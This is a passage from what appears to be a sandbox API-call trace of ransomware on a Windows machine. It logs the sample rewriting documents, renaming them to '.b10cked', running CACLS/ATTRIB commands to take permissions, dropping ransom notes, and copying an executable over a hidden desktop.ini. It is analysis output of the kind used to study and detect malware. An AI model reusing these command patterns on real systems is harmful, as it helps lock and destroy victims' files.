lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.162] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1498, lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5272, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x149a [0234.162] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1498, lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5272, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x149a [0234.162] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1498, lpOverlapped=0x0) returned 1 [0234.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kC6z.pptx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0234.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kC6z.pptx", cchWideChar=9, lpMultiByteStr=0x13131ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kC6z.pptx", lpUsedDefaultChar=0x0) returned 9 [0234.202] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2932 [0234.203] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.203] CloseHandle (hObject=0x1b4) returned 1 [0234.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\kC6z.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT") returned 0x24 [0234.204] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.204] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b4, dwThreadId=0xd50)) returned 1 [0234.216] CloseHandle (hObject=0x120) returned 1 [0234.216] CloseHandle (hObject=0x1b4) returned 1 [0234.216] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.216] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.216] CompareStringW 
(Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.217] ReleaseMutex (hMutex=0xf8) returned 1 [0234.217] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] CloseHandle (hObject=0x1b4) returned 1 [0234.219] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0234.219] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0234.219] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x828, dwThreadId=0x140)) returned 1 [0234.239] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] CloseHandle (hObject=0x120) returned 1 [0235.605] CloseHandle (hObject=0x1b4) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0235.605] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.605] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.606] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.606] CloseHandle (hObject=0x1b4) returned 1 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0235.606] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount1=37, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0235.606] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount1=37, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0235.606] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0235.606] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: 
lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0235.606] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0235.606] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\") returned 0x23 [0235.607] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0235.607] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0235.607] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xaac, dwThreadId=0xc00)) returned 1 [0235.625] CloseHandle (hObject=0x120) returned 1 [0235.625] CloseHandle (hObject=0x1b4) returned 1 [0235.625] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf")) returned 
0xffffffff [0235.625] GetLastError () returned 0x2 [0235.625] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0235.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf")) returned 0x20 [0235.628] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0235.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0235.628] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0235.629] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0235.629] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0235.629] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\") returned 0x23 [0235.629] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0235.629] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1") returned 0x22 [0235.630] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0235.630] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0235.630] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa40, dwThreadId=0x600)) returned 1 [0235.636] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0236.573] CloseHandle (hObject=0x1b4) returned 1 [0236.574] CloseHandle (hObject=0x120) returned 1 [0236.574] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.574] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.574] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex 
(hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ngdm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.574] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29336366225) returned 1 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 